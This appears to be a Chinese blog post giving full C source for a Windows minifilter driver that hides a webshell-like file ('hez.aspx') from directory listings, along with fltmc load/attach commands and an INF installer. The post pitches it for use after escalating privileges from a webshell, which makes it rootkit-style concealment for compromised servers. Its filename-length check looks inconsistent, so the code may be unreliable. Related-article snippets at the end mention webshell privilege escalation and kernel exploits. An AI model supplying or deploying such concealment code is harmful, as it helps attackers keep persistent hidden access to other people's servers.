server2008 加载驱动隐藏文件或文件夹方法,可在webshell下提权后使用,付切实可行办法

最新推荐文章于 2021-07-30 21:46:30 发布
最新推荐文章于 2021-07-30 21:46:30 发布
阅读量892 收藏
点赞数
始于C#,精于C&C++,醉心于Windows内核与Com组件安全研究
本文链接:https://blog.csdn.net/oShuangYue12/article/details/72567273
版权
先附上驱动代码,如何调试亲自行查询网上资料,解决windows资源管理器刷新驱动在vs2013下断点需要问题,看代码 
#include <fltKernel.h>
#include <dontuse.h>
#include <suppress.h>

#pragma prefast(disable:__WARNING_ENCODE_MEMBER_FUNCTION_POINTER, "Not valid for kernel mode drivers")


PFLT_FILTER filterHandle;
PWCHAR prefixName = L"hez.aspx";//要隐藏的文件名字

/*************************************************************************
Prototypes
*************************************************************************/

NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath);
NTSTATUS PtUnload(__in FLT_FILTER_UNLOAD_FLAGS Flags);

FLT_POSTOP_CALLBACK_STATUS
HideFilePostDirCtrl(
__inout PFLT_CALLBACK_DATA Data,
__in PCFLT_RELATED_OBJECTS FltObjects,
__in_opt PVOID CompletionContext,
__in FLT_POST_OPERATION_FLAGS Flags);

#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, PtUnload)
#endif

CONST FLT_OPERATION_REGISTRATION Callbacks[] =
{
	{ IRP_MJ_DIRECTORY_CONTROL,
	0,
	NULL,
	HideFilePostDirCtrl },

	{ IRP_MJ_OPERATION_END }
};

CONST FLT_REGISTRATION FilterRegistration =
{
	sizeof(FLT_REGISTRATION),         //  Size
	FLT_REGISTRATION_VERSION,           //  Version
	0,                                  //  Flags
	NULL,                               //  Context
	Callbacks,                          //  Operation callbacks
	PtUnload,                           //  MiniFilterUnload
	NULL,                               //  InstanceSetup
	NULL,                               //  InstanceQueryTeardown
	NULL,                               //  InstanceTeardownStart
	NULL,                               //  InstanceTeardownComplete
	NULL,                               //  GenerateFileName
	NULL,                               //  GenerateDestinationFileName
	NULL                                //  NormalizeNameComponent
};

NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath)
{
	NTSTATUS status;

	UNREFERENCED_PARAMETER(RegistryPath);

	status = FltRegisterFilter(DriverObject, &FilterRegistration, &filterHandle);

	if (NT_SUCCESS(status))
	{
		status = FltStartFiltering(filterHandle);

		if (!NT_SUCCESS(status))
		{
			FltUnregisterFilter(filterHandle);
		}
	}

	return status;
}

NTSTATUS PtUnload(__in FLT_FILTER_UNLOAD_FLAGS Flags)
{
	UNREFERENCED_PARAMETER(Flags);
	PAGED_CODE();

	FltUnregisterFilter(filterHandle);

	return STATUS_SUCCESS;
}

FLT_POSTOP_CALLBACK_STATUS
HideFilePostDirCtrl(
__inout PFLT_CALLBACK_DATA Data,
__in PCFLT_RELATED_OBJECTS FltObjects,
__in_opt PVOID CompletionContext,
__in FLT_POST_OPERATION_FLAGS Flags)
{
	ULONG nextOffset = 0;
	int modified = 0;
	int removedAllEntries = 1;
	PVOID SafeBuffer;



	PFILE_ID_BOTH_DIR_INFORMATION  currentFileInfo = 0;
	PFILE_ID_BOTH_DIR_INFORMATION  nextFileInfo = 0;
	PFILE_ID_BOTH_DIR_INFORMATION  previousFileInfo = 0;


	UNICODE_STRING fileName;

	UNREFERENCED_PARAMETER(FltObjects);
	UNREFERENCED_PARAMETER(CompletionContext);

	if (FlagOn(Flags, FLTFL_POST_OPERATION_DRAINING))
	{
		return FLT_POSTOP_FINISHED_PROCESSING;
	}

	//vista或win7返回的FileInformationClass结构不再是FileBothDirectoryInformation.
	//而是FileidBothDirectoryInformation
	if (Data->Iopb->MinorFunction == IRP_MN_QUERY_DIRECTORY &&
		(Data->Iopb->Parameters.DirectoryControl.QueryDirectory.FileInformationClass == FileIdBothDirectoryInformation) &&
		Data->Iopb->Parameters.DirectoryControl.QueryDirectory.Length > 0 &&
		NT_SUCCESS(Data->IoStatus.Status))
	{
		if (Data->Iopb->Parameters.DirectoryControl.QueryDirectory.MdlAddress != NULL)
		{
			SafeBuffer = MmGetSystemAddressForMdlSafe(
				Data->Iopb->Parameters.DirectoryControl.QueryDirectory.MdlAddress,
				NormalPagePriority);
		}
		else
		{
			SafeBuffer = Data->Iopb->Parameters.DirectoryControl.QueryDirectory.DirectoryBuffer;
		}

		if (SafeBuffer == NULL)
		{
			return FLT_POSTOP_FINISHED_PROCESSING;
		}

		currentFileInfo = (PFILE_ID_BOTH_DIR_INFORMATION )SafeBuffer;

		previousFileInfo = currentFileInfo;

		do
		{
			//Byte offset of the next FILE_BOTH_DIR_INFORMATION entry
			nextOffset = currentFileInfo->NextEntryOffset;


			nextFileInfo = (PFILE_ID_BOTH_DIR_INFORMATION )((PCHAR)(currentFileInfo)+nextOffset);
			//	如果要隐藏的文件夹在FILE_BOTH_DIR_INFORMATION的第一个情况 需要特殊处理
			if ((previousFileInfo == currentFileInfo) &&
				(_wcsnicmp(currentFileInfo->FileName, prefixName, wcslen(prefixName)) == 0 &&
				(currentFileInfo->FileNameLength == 2)))
			{
				RtlCopyMemory(currentFileInfo->FileName, L".", 2);
				currentFileInfo->FileNameLength = 0;
				FltSetCallbackDataDirty(Data);
				return FLT_POSTOP_FINISHED_PROCESSING;
			}

			//若满足条件,隐藏之 
			if (_wcsnicmp(currentFileInfo->FileName, prefixName, wcslen(prefixName)) == 0 && (currentFileInfo->FileNameLength == 2))
			{
				if (nextOffset == 0)
				{
					previousFileInfo->NextEntryOffset = 0;
				}
				else
				{
					previousFileInfo->NextEntryOffset = (ULONG)((PCHAR)currentFileInfo - (PCHAR)previousFileInfo) + nextOffset;
				}

				modified = 1;
			}
			else
			{
				removedAllEntries = 0;
				//前驱结点指针后移 
				previousFileInfo = currentFileInfo;
			}
			//当前指针后移 
			currentFileInfo = nextFileInfo;
		} while (nextOffset != 0);

		if (modified)
		{
			if (removedAllEntries)
			{
				Data->IoStatus.Status = STATUS_NO_MORE_FILES;
			}
			else
			{
				FltSetCallbackDataDirty(Data);
			}
		}
	}

	return FLT_POSTOP_FINISHED_PROCESSING;
}
原因很简单,不要用sc start启动驱动服务,这样启动

具体方法:驱动复制到虚拟机inf右键点安装,然后fltmc load FsFilter2

fltmc attach FsFilter2 c: -a 150000

其中 FsFilter2 驱动名 150000是优先级,使用fltmc可以看所有微驱动只要比luafv高就可以

fltmc load FsFilter2

fltmc attach FsFilter2 c: -a 150000

这2条命令就搞定

卸载命令是

fltmc unload FsFilter2

我已在虚拟机server2008r2实现成功可以隐藏文件或文件夹

原因是默认驱动高度模版attributes=高度未定义

这样定义就可以

;;;
;;; FsFilter2
;;;

[Version]
Signature   = "$Windows NT$"
; TODO - Change the Class and ClassGuid to match the Load Order Group value, see http://msdn.microsoft.com/en-us/windows/hardware/gg462963
; Class       = "ActivityMonitor"                         ;This is determined by the work this filter driver does
; ClassGuid   = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2}    ;This value is determined by the Load Order Group value
Class = "_TODO_Change_Class_appropriately_"
ClassGuid = {_TODO_Change_ClassGuid_appropriately_}
Provider    = %ManufacturerName%
DriverVer   = 
CatalogFile = FsFilter2.cat

[DestinationDirs]
DefaultDestDir          = 12
MiniFilter.DriverFiles  = 12            ;%windir%\system32\drivers

;;
;; Default install sections
;;

[DefaultInstall]
OptionDesc          = %ServiceDescription%
CopyFiles           = MiniFilter.DriverFiles

[DefaultInstall.Services]
AddService          = %ServiceName%,,MiniFilter.Service

;;
;; Default uninstall sections
;;

[DefaultUninstall]
DelFiles   = MiniFilter.DriverFiles

[DefaultUninstall.Services]
DelService = %ServiceName%,0x200      ;Ensure service is stopped before deleting

;
; Services Section
;

[MiniFilter.Service]
DisplayName      = %ServiceName%
Description      = %ServiceDescription%
ServiceBinary    = %12%\%DriverName%.sys        ;%windir%\system32\drivers\
Dependencies     = "FltMgr"
ServiceType      = 2                            ;SERVICE_FILE_SYSTEM_DRIVER
StartType        = 0                            ;SERVICE_DEMAND_START
ErrorControl     = 1                            ;SERVICE_ERROR_NORMAL
; TODO - Change the Load Order Group value, see http://connect.microsoft.com/site221/content/content.aspx?ContentID=2512
; LoadOrderGroup = "FSFilter Activity Monitor"
LoadOrderGroup = "_TODO_Change_LoadOrderGroup_appropriately_"
AddReg           = MiniFilter.AddRegistry

;
; Registry Modifications
;

[MiniFilter.AddRegistry]
HKR,,"DebugFlags",0x00010001 ,0x0
HKR,,"SupportedFeatures",0x00010001,0x3
HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance%
HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,409999
HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,0

;
; Copy Files
;

[MiniFilter.DriverFiles]
%DriverName%.sys

[SourceDisksFiles]
FsFilter2.sys = 1,,

[SourceDisksNames]
1 = %DiskId1%,,,

;;
;; String Section
;;

[Strings]
; TODO - Add your manufacturer
ManufacturerName        = "Template"
ServiceDescription      = "FsFilter2 Mini-Filter Driver"
ServiceName             = "FsFilter2"
DriverName              = "FsFilter2"
DiskId1                 = "FsFilter2 Device Installation Disk"

;Instances specific information.
DefaultInstance         = "FsFilter2 Instance"
Instance1.Name          = "FsFilter2 Instance"
; TODO - Change the altitude value, see http://connect.microsoft.com/site221/content/content.aspx?ContentID=2512
;Instance1.Altitude      = "370030"
Instance.Altitude       = "_TODO_Change_Altitude_appropriately_"
Instance1.Flags         = 0x0              ; Allow all attachments

王cb
关注
webshell提权教程linux,Linux下WEBSHELL提权
weixin_42379854的博客
05-05 825
用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提:1、目标机上安装了GCC能编译源码2、Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行...
2008 r2 server 提权_某次Windows渗透提权过程
weixin_39624071的博客
12-19 1623
0x01物色目标大多数站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取。robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利于自动化工具的批量采集,所以Censys、Shodan、Zoomeye就不会那么灵敏了。 首先在Censys中利用敏感路经找到了一堆服务器,挑了几个看起来顺眼的利用某代码执行漏洞写入WebShell ...
Windows_server_2008文件服务器-隐藏用户无权限访问的共享文件夹
07-06
Windows server 2008文件服务器-隐藏用户无权限访问的共享文件夹
服务器共享文件无法看到,Server2008服务器隐藏共享文件夹 隐藏用户无权访问的共享文件夹 隐藏服务器共享文件...
weixin_35373786的博客
07-30 653
在局域网共享文件管理中,有时候为了保护服务器共享文件的安全,我们常常需要隐藏用户无权限访问的共享文件、设置共享文件隐藏,防止未经授权的用户越权访问共享文件的行为,尤其是还可以阻止外来用户随意接入单位局域网访问共享文件的行为。具体如何实现呢?可以通过以下两种方案:方案1、基于访问权限的枚举的机制隐藏共享文件夹访问权限、隐藏无访问权限的共享文件夹。基于访问权限的枚举仅允许用户查看他们有权访问的基于S...
zwload隐藏服务加载驱动
xuplus的专栏
04-22 2352
五、隐藏服务:    普通情况下加载驱动需要 OpenSCManager->CreateService->StartService,这样驱动就会跑到服务管理器中去注册一下自己,并且要隐藏这样加载驱动的服务,不是不行,只是太麻烦而且没效率了。要hook一大堆的服务函数。不过在逆向IS的时候发现了一个不需要去服务管理器注册而直接加载驱动方法。就是使用ZwLoadDriver(这个函数通常是ring0
MiniFilter文件过滤驱动编译时遇到inf文件报错
苞米地里捉小鸡的博客
09-22 720
用MiniFilter写文件过滤驱动的时候,编译过程遇到inf文件中报错。 Invalid Class value “TODO_Change_Class_appropriately” exceeds max length of 31 Invalid ClassGuid “{TODO_Change_ClassGuid_appropriately}”,expecting{xxxxxxxx…} 就如下图这样 如何解决? 打开inf文件。 将上面两个Class和ClassGuid的注释取消。 将.
文件系统Minifilter驱动(二)
听风
03-02 1万+
二、Filter管理器模型的优势Filter管理器模型在现有的legacy过滤驱动模型之上提供了以下优势: l 比filter加载顺序更易控制. 不像legacy过滤驱动,一个minifilter驱动可以在任何时候被加载且因其altitude被绑定到合适的位置。l 在系统运行期间的卸载能力. 不像在系统运行期间不能被卸载的legacy过滤驱动,minifilter驱动能在任意时间被
webshell提权教程.doc
01-08
webshell提权教程
虚拟主机封杀webshell提权!!!!!!!!!!
10-01
本文将围绕“虚拟主机封杀WebShell提权”这一主题展开,详细介绍如何在Windows虚拟主机环境下,特别是针对ASP + SQL Server配置的服务器,通过一系列的安全策略来防范WebShell的入侵及利用,以及阻止Serv-U提权漏洞...
webshell提权教程
06-12
5. 使用提权工具:有一些开源的提权工具,如Linux下的pwnkit、Windows下的Metasploit等,可以帮助攻击者自动化提权过程。 四、防御Webshell提权 1. 安全编程:避免SQL注入、文件包含漏洞等常见攻击,对输入数据...
minifilter实现文件隐藏,很全,有源代码
04-20
里面是用windows驱动驱动的minifilter框架实现的文件隐藏功能,里面有六个条目,前两个条目分别是驱动层和应用层的源代码;接下来的两个文件时应用层的文件(一个是配置文件,一个是exe应用层文件),InstMiniDrv是加载minifilter驱动文件,最后一个是生成的驱动文件,ps(以上文件在启动时都要以管理员权限启动,不然会失败,因为驱动加载要用管理员权限才行)
文件系统Minifilter驱动(四)
听风
03-02 4321
四、控制Filter管理器操作在早于Vista的Windows中,filter管理器的操作由注册表中下列REG_DWORD AttachWhenLoaded值控制:HKLM/System/CurrentControlSet/Services/FltMgr当AttachWhenLoaded被设置为零时,filter管理器不会绑定到任何卷上直到某个minifilter驱动向filter管理
windows平台下常用命令
struborn_b的博客
06-05 316
1:结束进程 taskkill -F /IM process.exe 2:服务的起停 net servername start|stop|status 3:驱动的安装卸载 fltmc load|unload *sys
文件系统Minifilter驱动(五)
听风
03-02 6067
安装Minifilter驱动XP及更新的Windows OS中,你应该用INF文件和一个安装应用程序来安装你的minifilter驱动. (2K及更早的OS中,minifilter 驱动一般是借助Service Control Manager安装的.)注意"基于INF的安装"仅仅意味着你需要使用一个INF文件来复制文件并存储信息到注册表中.你没有被要求用仅仅一个INF文件来安装你的整个产品
文件重定向(采用文件过滤驱动实现)
myworldbig的专栏
06-28 4897
原文:http://hi.baidu.com/tzpwater/blog/item/9bf66eb5196b1fe130add132.html/cmtid/65f21515aea03006c83d6d41Windows的I/O管理器提供了一个方便的方法来重定向一个文件对象。通常使用文件过滤驱动(在文件打开和文件创建的操作中)实现该方法。操作方法如下:1、在IRP_MJ_CREATE的分发函
面向Windows的文件透明加解密解决方案(3)——透明加解密驱动程序二
热门推荐
某熊的技术之路
05-31 1万+
3.3关键技术详解 对于用户的文件操作请求,Windows 用户层中对文件的各种操作映射到微过滤驱动中就转化为类型为Create,Read,Write 和Close 等的I/O 操作,因此只要对这些操作的内容进行过滤处理,即可达到透明加解密的目的。首先在IRP_MJ_CREATE 中查询目标文件是否是监控文件类型,创建一个StreamContext 并附着在文件对象上,并在StreamConte
Windows Minifilter驱动 - 获取进程ID, 进程名字和线程ID (5)
zj510的专栏
09-22 8433
在minifilter里面可能有好几种获取调用进程id,名字和线程的办法。我这里有一种: 使用 PsSetCreateProcessNotifyRoutine 和 PsSetLoadImageNotifyRoutine 这是两个API,我们可以借助它们获取进程信息。具体看:http://msdn.microsoft.com/en-us/library/windows/hardware/
c++ member function pointer
weixin_52589646的博客
01-26 114
#include <iostream> #include <string> #include <sstream> #include <vector> #include<functional> using namespace std; class person { public: explicit person(const int& a, const string& b) :age(a), name(b) { cout &l
C++ member function pointer
gorunbu的专栏
05-07 968
//1.derived class can call the base class function, but the base class can not call the derived class function, member pointer can not do it //2.c++ member function is strict //3.the size of C++ poi
SQLmap使用指南:数据库提权Webshell获取
- `--file-write=WFILE` 和 `--file-dest=DFILE`: 分别用于编辑本地文件并在数据库管理系统上写入文件,这可以用来上传Webshell。 - `--priv-esc`: 提升数据库进程用户的权限,向更高级别的访问迈进。 2. MSSQL下的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值